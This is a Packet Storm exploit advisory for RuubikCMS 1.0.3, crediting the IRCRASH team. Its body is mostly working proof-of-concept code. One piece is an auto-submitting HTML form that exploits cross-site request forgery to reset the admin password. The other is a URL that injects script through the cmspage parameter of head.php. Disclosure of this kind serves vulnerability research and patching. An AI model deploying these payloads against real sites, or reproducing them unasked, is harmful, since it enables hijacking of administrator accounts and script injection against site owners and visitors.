Ruubik CMS version 1.0.3 suffers from cross site request forgery and cross site scripting vulnerabilities.
56dae94481d4111d9cf931f14c6f8bc87db754b196fb31c32526d51c70eb6fb7----------------------------------------------------------------
WebApplication : RuubikCMS Version 1.0.3
Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : https://www.ruubikcms.com/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
CSRF For Change Admin Password :
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="https://examplesite/ruubikcms/cms/users.php?role=5&p=admin";
method="POST" name="form">
<input type="hidden" name="save" value="1">
<input type="hidden" name="ordernum" value="1">
<input type="hidden" name="username_hidden" value="admin">
<input type="hidden" name="password" value="password">
<input type="hidden" name="confirmpassword" value="password">
</form>
</body>
</html>
------------------------------------------------
Cross Site Scripting Vulnerability :
https://examplesite/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed